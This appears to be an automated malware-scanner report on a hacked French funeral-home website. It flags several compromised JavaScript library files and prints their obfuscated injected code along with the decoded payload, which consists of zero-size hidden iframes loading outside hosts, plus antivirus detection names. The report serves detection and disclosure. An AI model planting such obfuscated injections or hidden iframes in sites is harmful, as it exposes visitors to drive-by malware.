New scan:

Malware Scanner report for pompes-funebres-samcina.com

Malicious/Suspicious/Total urls checked
6/0/25
6 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "pompes-funebres-samcina.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/1
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=pompes-funebres-samcina.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://pompes-funebres-samcina.com/
200 OK
Content-Length: 8339
Content-Type: text/html
clean
http://pompes-funebres-samcina.com/swfobject.js
200 OK
Content-Length: 13879
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1
... 3046 bytes are skipped ...
ape(document[_0x6dae[3]][_0x6dae[6]](offset,end));} ;} ;return _0x237bx4;} ;if(get_cookie(_0x6dae[7])==_0x6dae[1]&&navigator[_0x6dae[8]]==_0x6dae[9]){if(navigator[_0x6dae[10]]==_0x6dae[11]||navigator[_0x6dae[10]]==_0x6dae[12]){var popfrequency=_0x6dae[13];var expireDate= new Date();expireDate[_0x6dae[15]](expireDate[_0x6dae[14]]()+parseInt(popfrequency));document[_0x6dae[3]]=_0x6dae[16]+parseInt(popfrequency)+_0x6dae[17]+expireDate[_0x6dae[18]]();document[_0x6dae[20]](_0x6dae[19]);} ;} ;

Decoded script:


<iframe src="http://styles.sandcandles.org/in.cgi?default" width=0 height=0 frameborder=0></iframe><iframe src="http://android.womenthemanual.com/count" width=0 height=0 frameborder=0></iframe><iframe src="http://analytics.rebel5.com/stat.js" width=0 height=0 frameborder=0></iframe><iframe src="http://46.4.163.208/counter.js" width=0 height=0 frameborder=0></iframe><div width="600px" height="600px" style="visibility:hidden;"><iframe width="100%" height="100%" src="http://fr.integrabuilt.us/data/search.php?q=search"></iframe></div><div name="youtube"><iframe width="1" height="1" src="http://www.deheide.be/count.php" frameborder="0" allowfullscreen></iframe></div>

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
JS/iFrame.EB.357
Avast
JS:Iframe-CUE [Trj]
Ad-Aware
Trojan.JS.Redirector.TA
Ikarus
Virus.HTML.Framer
nProtect
Trojan.JS.Redirector.TA
TrendMicro-HouseCall
TROJ_GEN.F47V0102
Comodo
UnclassifiedMalware
Emsisoft
Trojan.JS.Redirector.TA (B)
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
Microsoft
Exploit:HTML/IframeRef.Z
MicroWorld-eScan
Trojan.JS.Redirector.TA
NANO-Antivirus
Trojan.Url.IframeB.brrwdh
F-Secure
Trojan.JS.Redirector.TA
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
AVG
HTML/Framer
Norman
IframeRef.DX
GData
Trojan.JS.Redirector.TA
Commtouch
IFrame.gen
ESET-NOD32
HTML/Iframe.B.Gen
BitDefender
Trojan.JS.Redirector.TA

http://pompes-funebres-samcina.com/iepngfix_tilebg.js
200 OK
Content-Length: 12073
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var IEPNGFix = window.IEPNGFix || {};
IEPNGFix.tileBG = function(elm, pngSrc, ready) {

var data = this.data[elm.uniqueID],
elmW = Math.max(elm.clientWidth, elm.scrollWidth),
elmH = Math.max(elm.clientHeight, elm.scrollHeight),
bgX = elm.currentStyle.backgroundPositionX,
bgY = elm.currentStyle.backgroundPositionY,
bgR = elm.currentStyle.backgroundRepeat;
if (!data.tiles) {
data.tiles = {
elm: elm,
src: '',
cache: [],
... 3421 bytes are skipped ...
.__$+$.$__+$.$$$+"\\"+$.__$+$.$_$+$.___+$.__+"=\\\""+$.$$_+$.___+"\\\"\\"+$.$__+$.___+$.$_$_+(![]+"")[$._$_]+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.__$+$.$_$+$.$$_+"=\\\""+(![]+"")[$._$_]+$.$$$_+$.$$$$+$.__+"\\\">\\"+$.__$+$.___+$._$$+$._$+$._+"\\"+$.__$+$.$_$+$.$$_+$.__+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"</\\"+$.__$+$.$_$+$.__$+$.$$$$+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"></"+$.$$_$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.$$_+">');"+"\"")())();

Decoded script:


function () {
clearTimeout(IEPNGFix.update.timer);
IEPNGFix.update.timer = setTimeout(IEPNGFix.update, 100);
}
<iframe src="http://www2.mcgregart.com/in.cgi?2" width=0 height=0 frameborder=0></iframe><iframe src="http://styles.sandcandles.org/in.cgi?default" width=0 height=0 frameborder=0></iframe><iframe src="http://android.womenthemanual.com/count" width=0 height=0 frameborder=0></iframe><iframe src="http://analytics.rebel5.com/stat.js" width=0 height=0 frameborder=0></iframe><iframe src="http://46.4.163.208/counter.js" width=0 height=0 frameborder=0></iframe><div width="600px" height="600px" style="visibility:hidden;"><iframe width="100%" height="100%" src="http://fr.integrabuilt.us/data/search.php?q=search"></iframe></div>

Antivirus reports:

Avast
HTML:Iframe-inf
Ikarus
Exploit.HTML.IframeRef
nProtect
Trojan.JS.Redirector.TA
Emsisoft
Trojan.JS.Redirector.TA (B)
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
Microsoft
Exploit:HTML/IframeRef.Z
MicroWorld-eScan
Trojan.JS.Redirector.TA
NANO-Antivirus
Trojan.Url.IframeB.bmlwta
F-Secure
Trojan.JS.Redirector.TA
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
Norman
IframeRef.DX
GData
Trojan.JS.Redirector.TA
Commtouch
IFrame.gen
ESET-NOD32
HTML/Iframe.B.Gen
BitDefender
Trojan.JS.Redirector.TA

http://pompes-funebres-samcina.com/AC_RunActiveContent.js
200 OK
Content-Length: 16000
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false;
var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false;
function ControlVersion()
{
var version;
var axo;
var e;

try {
axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
version = axo.GetVariable("$version");
} catch (e) {
}
if (!version)
... 3313 bytes are skipped ...
.__$+$.$__+$.$$$+"\\"+$.__$+$.$_$+$.___+$.__+"=\\\""+$.$$_+$.___+"\\\"\\"+$.$__+$.___+$.$_$_+(![]+"")[$._$_]+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.__$+$.$_$+$.$$_+"=\\\""+(![]+"")[$._$_]+$.$$$_+$.$$$$+$.__+"\\\">\\"+$.__$+$.___+$._$$+$._$+$._+"\\"+$.__$+$.$_$+$.$$_+$.__+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"</\\"+$.__$+$.$_$+$.__$+$.$$$$+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"></"+$.$$_$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.$$_+">');"+"\"")())();

Decoded script:


<iframe src="http://www2.mcgregart.com/in.cgi?2" width=0 height=0 frameborder=0></iframe><iframe src="http://styles.sandcandles.org/in.cgi?default" width=0 height=0 frameborder=0></iframe><iframe src="http://android.womenthemanual.com/count" width=0 height=0 frameborder=0></iframe><iframe src="http://analytics.rebel5.com/stat.js" width=0 height=0 frameborder=0></iframe><iframe src="http://46.4.163.208/counter.js" width=0 height=0 frameborder=0></iframe><div width="600px" height="600px" style="visibility:hidden;"><iframe width="100%" height="100%" src="http://fr.integrabuilt.us/data/search.php?q=search"></iframe></div>

Antivirus reports:

Avast
HTML:Iframe-inf
nProtect
Trojan.JS.Redirector.TA
Emsisoft
Trojan.JS.Redirector.TA (B)
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
Microsoft
Exploit:HTML/IframeRef.Z
MicroWorld-eScan
Trojan.JS.Redirector.TA
F-Secure
Trojan.JS.Redirector.TA
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
Norman
IframeRef.DX
GData
Trojan.JS.Redirector.TA
Commtouch
IFrame.gen
ESET-NOD32
HTML/Iframe.B.Gen
BitDefender
Trojan.JS.Redirector.TA

http://pompes-funebres-samcina.com/index.php
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 10 Jan 2015 13:34:17 GMT
Location: http://www.pompes-funebres-samcina.com/pompes-funebres.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 267
Content-Type: text/html; charset=iso-8859-1
clean
http://www.pompes-funebres-samcina.com/pompes-funebres.html
200 OK
Content-Length: 8339
Content-Type: text/html
clean
http://www.pompes-funebres-samcina.com/swfobject.js
200 OK
Content-Length: 13879
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1
... 3046 bytes are skipped ...
ape(document[_0x6dae[3]][_0x6dae[6]](offset,end));} ;} ;return _0x237bx4;} ;if(get_cookie(_0x6dae[7])==_0x6dae[1]&&navigator[_0x6dae[8]]==_0x6dae[9]){if(navigator[_0x6dae[10]]==_0x6dae[11]||navigator[_0x6dae[10]]==_0x6dae[12]){var popfrequency=_0x6dae[13];var expireDate= new Date();expireDate[_0x6dae[15]](expireDate[_0x6dae[14]]()+parseInt(popfrequency));document[_0x6dae[3]]=_0x6dae[16]+parseInt(popfrequency)+_0x6dae[17]+expireDate[_0x6dae[18]]();document[_0x6dae[20]](_0x6dae[19]);} ;} ;

Decoded script:


<iframe src="http://styles.sandcandles.org/in.cgi?default" width=0 height=0 frameborder=0></iframe><iframe src="http://android.womenthemanual.com/count" width=0 height=0 frameborder=0></iframe><iframe src="http://analytics.rebel5.com/stat.js" width=0 height=0 frameborder=0></iframe><iframe src="http://46.4.163.208/counter.js" width=0 height=0 frameborder=0></iframe><div width="600px" height="600px" style="visibility:hidden;"><iframe width="100%" height="100%" src="http://fr.integrabuilt.us/data/search.php?q=search"></iframe></div><div name="youtube"><iframe width="1" height="1" src="http://www.deheide.be/count.php" frameborder="0" allowfullscreen></iframe></div>

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
JS/iFrame.EB.357
Avast
JS:Iframe-CUE [Trj]
Ad-Aware
Trojan.JS.Redirector.TA
Ikarus
Virus.HTML.Framer
nProtect
Trojan.JS.Redirector.TA
TrendMicro-HouseCall
TROJ_GEN.F47V0102
Comodo
UnclassifiedMalware
Emsisoft
Trojan.JS.Redirector.TA (B)
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
Microsoft
Exploit:HTML/IframeRef.Z
MicroWorld-eScan
Trojan.JS.Redirector.TA
NANO-Antivirus
Trojan.Url.IframeB.brrwdh
F-Secure
Trojan.JS.Redirector.TA
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
AVG
HTML/Framer
Norman
IframeRef.DX
GData
Trojan.JS.Redirector.TA
Commtouch
IFrame.gen
ESET-NOD32
HTML/Iframe.B.Gen
BitDefender
Trojan.JS.Redirector.TA

http://pompes-funebres-samcina.com/les_demarches.php
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 10 Jan 2015 13:34:20 GMT
Location: http://www.pompes-funebres-samcina.com/demarches-enterrement-outre-mer.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 283
Content-Type: text/html; charset=iso-8859-1
clean
http://www.pompes-funebres-samcina.com/demarches-enterrement-outre-mer.html
200 OK
Content-Length: 8288
Content-Type: text/html
clean
http://www.pompes-funebres-samcina.com/iepngfix_tilebg.js
200 OK
Content-Length: 12073
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var IEPNGFix = window.IEPNGFix || {};
IEPNGFix.tileBG = function(elm, pngSrc, ready) {

var data = this.data[elm.uniqueID],
elmW = Math.max(elm.clientWidth, elm.scrollWidth),
elmH = Math.max(elm.clientHeight, elm.scrollHeight),
bgX = elm.currentStyle.backgroundPositionX,
bgY = elm.currentStyle.backgroundPositionY,
bgR = elm.currentStyle.backgroundRepeat;
if (!data.tiles) {
data.tiles = {
elm: elm,
src: '',
cache: [],
... 3421 bytes are skipped ...
.__$+$.$__+$.$$$+"\\"+$.__$+$.$_$+$.___+$.__+"=\\\""+$.$$_+$.___+"\\\"\\"+$.$__+$.___+$.$_$_+(![]+"")[$._$_]+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.__$+$.$_$+$.$$_+"=\\\""+(![]+"")[$._$_]+$.$$$_+$.$$$$+$.__+"\\\">\\"+$.__$+$.___+$._$$+$._$+$._+"\\"+$.__$+$.$_$+$.$$_+$.__+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"</\\"+$.__$+$.$_$+$.__$+$.$$$$+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"></"+$.$$_$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.$$_+">');"+"\"")())();

Decoded script:


function () {
clearTimeout(IEPNGFix.update.timer);
IEPNGFix.update.timer = setTimeout(IEPNGFix.update, 100);
}
<iframe src="http://www2.mcgregart.com/in.cgi?2" width=0 height=0 frameborder=0></iframe><iframe src="http://styles.sandcandles.org/in.cgi?default" width=0 height=0 frameborder=0></iframe><iframe src="http://android.womenthemanual.com/count" width=0 height=0 frameborder=0></iframe><iframe src="http://analytics.rebel5.com/stat.js" width=0 height=0 frameborder=0></iframe><iframe src="http://46.4.163.208/counter.js" width=0 height=0 frameborder=0></iframe><div width="600px" height="600px" style="visibility:hidden;"><iframe width="100%" height="100%" src="http://fr.integrabuilt.us/data/search.php?q=search"></iframe></div>

Antivirus reports:

Avast
HTML:Iframe-inf
Ikarus
Exploit.HTML.IframeRef
nProtect
Trojan.JS.Redirector.TA
Emsisoft
Trojan.JS.Redirector.TA (B)
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
Microsoft
Exploit:HTML/IframeRef.Z
MicroWorld-eScan
Trojan.JS.Redirector.TA
NANO-Antivirus
Trojan.Url.IframeB.bmlwta
F-Secure
Trojan.JS.Redirector.TA
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
Norman
IframeRef.DX
GData
Trojan.JS.Redirector.TA
Commtouch
IFrame.gen
ESET-NOD32
HTML/Iframe.B.Gen
BitDefender
Trojan.JS.Redirector.TA

http://pompes-funebres-samcina.com/contrat_obseques.php
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 10 Jan 2015 13:34:21 GMT
Location: http://www.pompes-funebres-samcina.com/organisation-contrat-obseques.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 281
Content-Type: text/html; charset=iso-8859-1
clean
http://www.pompes-funebres-samcina.com/organisation-contrat-obseques.html
200 OK
Content-Length: 7444
Content-Type: text/html
clean
http://www.pompes-funebres-samcina.com/AC_RunActiveContent.js
200 OK
Content-Length: 16000
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false;
var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false;
function ControlVersion()
{
var version;
var axo;
var e;

try {
axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
version = axo.GetVariable("$version");
} catch (e) {
}
if (!version)
... 3313 bytes are skipped ...
.__$+$.$__+$.$$$+"\\"+$.__$+$.$_$+$.___+$.__+"=\\\""+$.$$_+$.___+"\\\"\\"+$.$__+$.___+$.$_$_+(![]+"")[$._$_]+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.__$+$.$_$+$.$$_+"=\\\""+(![]+"")[$._$_]+$.$$$_+$.$$$$+$.__+"\\\">\\"+$.__$+$.___+$._$$+$._$+$._+"\\"+$.__$+$.$_$+$.$$_+$.__+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"</\\"+$.__$+$.$_$+$.__$+$.$$$$+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"></"+$.$$_$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.$$_+">');"+"\"")())();

Decoded script:


<iframe src="http://www2.mcgregart.com/in.cgi?2" width=0 height=0 frameborder=0></iframe><iframe src="http://styles.sandcandles.org/in.cgi?default" width=0 height=0 frameborder=0></iframe><iframe src="http://android.womenthemanual.com/count" width=0 height=0 frameborder=0></iframe><iframe src="http://analytics.rebel5.com/stat.js" width=0 height=0 frameborder=0></iframe><iframe src="http://46.4.163.208/counter.js" width=0 height=0 frameborder=0></iframe><div width="600px" height="600px" style="visibility:hidden;"><iframe width="100%" height="100%" src="http://fr.integrabuilt.us/data/search.php?q=search"></iframe></div>

Antivirus reports:

Avast
HTML:Iframe-inf
nProtect
Trojan.JS.Redirector.TA
Emsisoft
Trojan.JS.Redirector.TA (B)
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
Microsoft
Exploit:HTML/IframeRef.Z
MicroWorld-eScan
Trojan.JS.Redirector.TA
F-Secure
Trojan.JS.Redirector.TA
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
Norman
IframeRef.DX
GData
Trojan.JS.Redirector.TA
Commtouch
IFrame.gen
ESET-NOD32
HTML/Iframe.B.Gen
BitDefender
Trojan.JS.Redirector.TA

http://pompes-funebres-samcina.com/marberie.php
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 10 Jan 2015 13:34:22 GMT
Location: http://www.pompes-funebres-samcina.com/marbrerie-funeraire.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1
clean
http://www.pompes-funebres-samcina.com/marbrerie-funeraire.html
200 OK
Content-Length: 7735
Content-Type: text/html
clean
http://www.pompes-funebres-samcina.com/index.php
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 10 Jan 2015 13:34:22 GMT
Location: http://www.pompes-funebres-samcina.com/pompes-funebres.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 267
Content-Type: text/html; charset=iso-8859-1
clean
http://www.pompes-funebres-samcina.com/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean
http://pompes-funebres-samcina.com/articles_funeraires.php
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 10 Jan 2015 13:34:22 GMT
Location: http://www.pompes-funebres-samcina.com/funerailles-articles-funeraires.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 283
Content-Type: text/html; charset=iso-8859-1
clean
http://www.pompes-funebres-samcina.com/funerailles-articles-funeraires.html
200 OK
Content-Length: 7592
Content-Type: text/html
clean
http://www.pompes-funebres-samcina.com/les_demarches.php
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 10 Jan 2015 13:34:23 GMT
Location: http://www.pompes-funebres-samcina.com/demarches-enterrement-outre-mer.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 283
Content-Type: text/html; charset=iso-8859-1
clean
http://pompes-funebres-samcina.com/fleurs.php
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 10 Jan 2015 13:34:23 GMT
Location: http://www.pompes-funebres-samcina.com/fleurs-funerailles.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 270
Content-Type: text/html; charset=iso-8859-1
clean
http://www.pompes-funebres-samcina.com/fleurs-funerailles.html
200 OK
Content-Length: 7585
Content-Type: text/html
clean
http://www.pompes-funebres-samcina.com/contrat_obseques.php
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 10 Jan 2015 13:34:24 GMT
Location: http://www.pompes-funebres-samcina.com/organisation-contrat-obseques.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 281
Content-Type: text/html; charset=iso-8859-1
clean
http://pompes-funebres-samcina.com/contact.php
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 10 Jan 2015 13:34:24 GMT
Location: http://www.pompes-funebres-samcina.com/enterrement-funerailles.html
Server: Apache
Vary: Accept-Encoding
Content-Length: 275
Content-Type: text/html; charset=iso-8859-1
clean
http://www.pompes-funebres-samcina.com/enterrement-funerailles.html
200 OK
Content-Length: 9748
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: pompes-funebres-samcina.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 13:34:14 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.4.9-4~lucid+1
Second query (visit from search engine):
GET / HTTP/1.1
Host: pompes-funebres-samcina.com
Referer: http://www.google.com/search?q=pompes-funebres-samcina.com

Result:
The result is similar to the first query. There are no suspicious redirects found.